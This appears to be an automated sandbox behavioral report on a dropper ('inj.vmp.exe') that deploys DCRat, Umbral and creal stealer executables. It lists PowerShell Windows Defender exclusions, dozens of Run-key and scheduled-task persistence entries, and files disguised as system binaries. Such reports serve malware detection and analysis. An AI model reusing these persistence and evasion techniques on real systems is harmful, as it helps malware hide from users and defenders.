description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2352 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1676 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2336 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2720 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2628 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2212 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2472 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2604 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2524 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1708 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 832 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1844 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2940 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2460 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1300 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1324 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1732 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1476 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2824 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 296 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1868 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1032 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1052 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2064 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2956 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 720 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2932 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2768 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2268 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 840 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2092 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 656 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1592 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 912 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 908 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1728 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1864 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1768 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2332 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 584 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1780 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1828 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1752 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2516 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2036 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3024 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1772 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 312 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1560 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2180 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2428 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2536 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1712 572 schtasks.exe 38 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 572 schtasks.exe 38 -
resource yara_rule behavioral1/files/0x0015000000014726-50.dat dcrat behavioral1/files/0x0005000000019616-202.dat dcrat behavioral1/memory/1968-203-0x0000000000BE0000-0x0000000000CEE000-memory.dmp dcrat behavioral1/memory/2476-252-0x00000000003C0000-0x00000000004CE000-memory.dmp dcrat behavioral1/memory/1692-274-0x0000000000AC0000-0x0000000000BCE000-memory.dmp dcrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2724 Umbral.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 676 powershell.exe 348 powershell.exe 2332 powershell.exe 1520 powershell.exe -
Executes dropped EXE 9 IoCs
pid Process 2660 111.exe 2108 DCRatBuild.exe 2436 creal.exe 2724 Umbral.exe 2796 creal.exe 1968 Chainblock.exe 2476 Chainblock.exe 1692 Idle.exe 1196 Process not Found -
Loads dropped DLL 9 IoCs
pid Process 1032 inj.vmp.exe 1032 inj.vmp.exe 1032 inj.vmp.exe 1032 inj.vmp.exe 2436 creal.exe 2796 creal.exe 3048 cmd.exe 3048 cmd.exe 1196 Process not Found -
resource yara_rule behavioral1/memory/1032-42-0x0000000000400000-0x0000000002FD2000-memory.dmp vmprotect behavioral1/memory/1032-53-0x0000000000400000-0x0000000002FD2000-memory.dmp vmprotect behavioral1/memory/1032-66-0x0000000000400000-0x0000000002FD2000-memory.dmp vmprotect behavioral1/memory/1032-159-0x0000000000400000-0x0000000002FD2000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 51 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Users\\Admin\\My Documents\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Windows\\Help\\Windows\\ja-JP\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\driverdllnetdhcp\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\winlogon.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Windows\\system\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default User\\Idle.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Users\\Admin\\My Documents\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Program Files (x86)\\Common Files\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\wininit.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Windows\\system\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Windows Media Player\\Network Sharing\\dwm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Windows\\L2Schemas\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\drivers win gui32-64 = "C:\\Users\\Public\\drivers win gui32-64.exe" 111.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\Idle.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Fonts\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\driverdllnetdhcp\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\driverdllnetdhcp\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\driverdllnetdhcp\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Windows Mail\\es-ES\\cmd.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\111 = "\"C:\\driverdllnetdhcp\\111.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\driverdllnetdhcp\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\driverdllnetdhcp\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\dwm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Downloaded Program Files\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\creal = "\"C:\\Windows\\L2Schemas\\creal.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\explorer.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Program Files (x86)\\Common Files\\lsm.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\111 = "\"C:\\driverdllnetdhcp\\111.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\5b7985c2-d100-11ee-bb00-c695cbc44580\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Google\\Temp\\sppsvc.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Downloaded Program Files\\csrss.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Windows Media Player\\Visualizations\\winlogon.exe\"" Chainblock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default User\\Idle.exe\"" Chainblock.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1032 inj.vmp.exe -
Drops file in Program Files directory 15 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\lsm.exe Chainblock.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\101b941d020240 Chainblock.exe File created C:\Program Files\Windows Media Player\Network Sharing\6cb0b6c459d5d3 Chainblock.exe File created C:\Program Files (x86)\Google\Temp\sppsvc.exe Chainblock.exe File created C:\Program Files (x86)\Windows Mail\es-ES\ebf1f9fa8afd6d Chainblock.exe File created C:\Program Files (x86)\Google\Temp\0a1fd5f707cd16 Chainblock.exe File created C:\Program Files\Windows Media Player\Visualizations\winlogon.exe Chainblock.exe File created C:\Program Files\Windows Media Player\Network Sharing\dwm.exe Chainblock.exe File opened for modification C:\Program Files (x86)\Google\Temp\sppsvc.exe Chainblock.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe Chainblock.exe File created C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe Chainblock.exe File created C:\Program Files\Windows Media Player\Visualizations\cc11b995f2a76d Chainblock.exe File created C:\Program Files (x86)\Common Files\101b941d020240 Chainblock.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe Chainblock.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\7a0fd90576e088 Chainblock.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\rescache\rc0006\lsass.exe Chainblock.exe File created C:\Windows\system\creal.exe Chainblock.exe File created C:\Windows\Downloaded Program Files\csrss.exe Chainblock.exe File created C:\Windows\L2Schemas\creal.exe Chainblock.exe File created C:\Windows\L2Schemas\55535abbd66d66 Chainblock.exe File created C:\Windows\Downloaded Program Files\886983d96e3d3e Chainblock.exe File created C:\Windows\Help\Windows\ja-JP\creal.exe Chainblock.exe File created C:\Windows\Help\Windows\ja-JP\55535abbd66d66 Chainblock.exe File created C:\Windows\system\55535abbd66d66 Chainblock.exe File created C:\Windows\rescache\rc0006\explorer.exe Chainblock.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000d000000014971-63.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2536 schtasks.exe 2724 schtasks.exe 2212 schtasks.exe 656 schtasks.exe 2516 schtasks.exe 2036 schtasks.exe 2288 schtasks.exe 2268 schtasks.exe 1708 schtasks.exe 1844 schtasks.exe 2824 schtasks.exe 1868 schtasks.exe 2336 schtasks.exe 2524 schtasks.exe 1712 schtasks.exe 2604 schtasks.exe 2000 schtasks.exe 1828 schtasks.exe 1504 schtasks.exe 1528 schtasks.exe 720 schtasks.exe 2092 schtasks.exe 2352 schtasks.exe 2428 schtasks.exe 812 schtasks.exe 780 schtasks.exe 2840 schtasks.exe 2768 schtasks.exe 2332 schtasks.exe 2180 schtasks.exe 704 schtasks.exe 1432 schtasks.exe 1808 schtasks.exe 912 schtasks.exe 2064 schtasks.exe 1768 schtasks.exe 3024 schtasks.exe 1772 schtasks.exe 2940 schtasks.exe 1300 schtasks.exe 1780 schtasks.exe 2628 schtasks.exe 1864 schtasks.exe 2084 schtasks.exe 1476 schtasks.exe 296 schtasks.exe 840 schtasks.exe 908 schtasks.exe 2720 schtasks.exe 276 schtasks.exe 2956 schtasks.exe 1728 schtasks.exe 2680 schtasks.exe 832 schtasks.exe 1032 schtasks.exe 2680 schtasks.exe 1052 schtasks.exe 584 schtasks.exe 1752 schtasks.exe 1628 schtasks.exe 3016 schtasks.exe 2460 schtasks.exe 1732 schtasks.exe 1844 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 1032 inj.vmp.exe 1032 inj.vmp.exe 2332 powershell.exe 1520 powershell.exe 676 powershell.exe 348 powershell.exe 2660 111.exe 1968 Chainblock.exe 1968 Chainblock.exe 1968 Chainblock.exe 1968 Chainblock.exe 1968 Chainblock.exe 1968 Chainblock.exe 1968 Chainblock.exe 2476 Chainblock.exe 2476 Chainblock.exe 2476 Chainblock.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe 1692 Idle.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 2660 111.exe Token: SeDebugPrivilege 2724 Umbral.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeIncreaseQuotaPrivilege 1616 wmic.exe Token: SeSecurityPrivilege 1616 wmic.exe Token: SeTakeOwnershipPrivilege 1616 wmic.exe Token: SeLoadDriverPrivilege 1616 wmic.exe Token: SeSystemProfilePrivilege 1616 wmic.exe Token: SeSystemtimePrivilege 1616 wmic.exe Token: SeProfSingleProcessPrivilege 1616 wmic.exe Token: SeIncBasePriorityPrivilege 1616 wmic.exe Token: SeCreatePagefilePrivilege 1616 wmic.exe Token: SeBackupPrivilege 1616 wmic.exe Token: SeRestorePrivilege 1616 wmic.exe Token: SeShutdownPrivilege 1616 wmic.exe Token: SeDebugPrivilege 1616 wmic.exe Token: SeSystemEnvironmentPrivilege 1616 wmic.exe Token: SeRemoteShutdownPrivilege 1616 wmic.exe Token: SeUndockPrivilege 1616 wmic.exe Token: SeManageVolumePrivilege 1616 wmic.exe Token: 33 1616 wmic.exe Token: 34 1616 wmic.exe Token: 35 1616 wmic.exe Token: SeIncreaseQuotaPrivilege 1616 wmic.exe Token: SeSecurityPrivilege 1616 wmic.exe Token: SeTakeOwnershipPrivilege 1616 wmic.exe Token: SeLoadDriverPrivilege 1616 wmic.exe Token: SeSystemProfilePrivilege 1616 wmic.exe Token: SeSystemtimePrivilege 1616 wmic.exe Token: SeProfSingleProcessPrivilege 1616 wmic.exe Token: SeIncBasePriorityPrivilege 1616 wmic.exe Token: SeCreatePagefilePrivilege 1616 wmic.exe Token: SeBackupPrivilege 1616 wmic.exe Token: SeRestorePrivilege 1616 wmic.exe Token: SeShutdownPrivilege 1616 wmic.exe Token: SeDebugPrivilege 1616 wmic.exe Token: SeSystemEnvironmentPrivilege 1616 wmic.exe Token: SeRemoteShutdownPrivilege 1616 wmic.exe Token: SeUndockPrivilege 1616 wmic.exe Token: SeManageVolumePrivilege 1616 wmic.exe Token: 33 1616 wmic.exe Token: 34 1616 wmic.exe Token: 35 1616 wmic.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 348 powershell.exe Token: SeDebugPrivilege 2660 111.exe Token: SeDebugPrivilege 1968 Chainblock.exe Token: SeDebugPrivilege 2476 Chainblock.exe Token: SeDebugPrivilege 1692 Idle.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2660 111.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1032 wrote to memory of 2660 1032 inj.vmp.exe 28 PID 1032 wrote to memory of 2660 1032 inj.vmp.exe 28 PID 1032 wrote to memory of 2660 1032 inj.vmp.exe 28 PID 1032 wrote to memory of 2660 1032 inj.vmp.exe 28 PID 1032 wrote to memory of 2108 1032 inj.vmp.exe 29 PID 1032 wrote to memory of 2108 1032 inj.vmp.exe 29 PID 1032 wrote to memory of 2108 1032 inj.vmp.exe 29 PID 1032 wrote to memory of 2108 1032 inj.vmp.exe 29 PID 1032 wrote to memory of 2436 1032 inj.vmp.exe 30 PID 1032 wrote to memory of 2436 1032 inj.vmp.exe 30 PID 1032 wrote to memory of 2436 1032 inj.vmp.exe 30 PID 1032 wrote to memory of 2436 1032 inj.vmp.exe 30 PID 1032 wrote to memory of 2724 1032 inj.vmp.exe 117 PID 1032 wrote to memory of 2724 1032 inj.vmp.exe 117 PID 1032 wrote to memory of 2724 1032 inj.vmp.exe 117 PID 1032 wrote to memory of 2724 1032 inj.vmp.exe 117 PID 2436 wrote to memory of 2796 2436 creal.exe 32 PID 2436 wrote to memory of 2796 2436 creal.exe 32 PID 2436 wrote to memory of 2796 2436 creal.exe 32 PID 2108 wrote to memory of 1312 2108 DCRatBuild.exe 33 PID 2108 wrote to memory of 1312 2108 DCRatBuild.exe 33 PID 2108 wrote to memory of 1312 2108 DCRatBuild.exe 33 PID 2108 wrote to memory of 1312 2108 DCRatBuild.exe 33 PID 2660 wrote to memory of 2332 2660 111.exe 95 PID 2660 wrote to memory of 2332 2660 111.exe 95 PID 2660 wrote to memory of 2332 2660 111.exe 95 PID 2724 wrote to memory of 1616 2724 Umbral.exe 36 PID 2724 wrote to memory of 1616 2724 Umbral.exe 36 PID 2724 wrote to memory of 1616 2724 Umbral.exe 36 PID 2660 wrote to memory of 1520 2660 111.exe 39 PID 2660 wrote to memory of 1520 2660 111.exe 39 PID 2660 wrote to memory of 1520 2660 111.exe 39 PID 2660 wrote to memory of 676 2660 111.exe 41 PID 2660 wrote to memory of 676 2660 111.exe 41 PID 2660 wrote to memory of 676 2660 111.exe 41 PID 2660 wrote to memory of 348 2660 111.exe 43 PID 2660 wrote to memory of 348 2660 111.exe 43 PID 2660 wrote to memory of 348 2660 111.exe 43 PID 1312 wrote to memory of 3048 1312 WScript.exe 45 PID 1312 wrote to memory of 3048 1312 WScript.exe 45 PID 1312 wrote to memory of 3048 1312 WScript.exe 45 PID 1312 wrote to memory of 3048 1312 WScript.exe 45 PID 3048 wrote to memory of 1968 3048 cmd.exe 47 PID 3048 wrote to memory of 1968 3048 cmd.exe 47 PID 3048 wrote to memory of 1968 3048 cmd.exe 47 PID 3048 wrote to memory of 1968 3048 cmd.exe 47 PID 1968 wrote to memory of 2600 1968 Chainblock.exe 105 PID 1968 wrote to memory of 2600 1968 Chainblock.exe 105 PID 1968 wrote to memory of 2600 1968 Chainblock.exe 105 PID 2600 wrote to memory of 1800 2600 cmd.exe 107 PID 2600 wrote to memory of 1800 2600 cmd.exe 107 PID 2600 wrote to memory of 1800 2600 cmd.exe 107 PID 2600 wrote to memory of 2476 2600 cmd.exe 108 PID 2600 wrote to memory of 2476 2600 cmd.exe 108 PID 2600 wrote to memory of 2476 2600 cmd.exe 108 PID 2476 wrote to memory of 2008 2476 Chainblock.exe 127 PID 2476 